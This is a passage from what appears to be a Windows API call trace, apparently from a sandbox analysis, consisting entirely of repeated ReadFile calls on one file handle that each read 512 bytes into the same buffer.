hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.165] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.165] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.165] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.166] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.166] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.166] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.166] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.166] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.166] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.166] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.166] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.166] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.166] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.166] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.167] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.167] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.167] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.167] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.167] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.167] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.167] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.167] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.167] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.167] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.167] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.168] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.168] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.168] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.168] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.168] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.168] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.168] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.168] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.168] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.168] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.168] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.168] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.169] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.169] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.169] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.169] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.169] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.169] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.169] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.169] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.169] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.169] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.169] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.169] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.170] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.170] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.170] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.170] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.170] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.170] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.170] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.170] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.170] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.170] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.170] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.170] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.171] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.171] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.171] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.171] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.171] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.171] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.171] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.171] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.171] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.171] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.171] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.171] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.172] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.172] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.172] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.172] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.172] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.172] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.172] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.172] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.172] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.172] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.172] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.172] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.173] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.173] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.173] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.173] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.173] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.173] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.173] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.173] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.173] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.174] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.174] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.174] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.174] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.175] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.175] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.175] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.175] ReadFile (in: 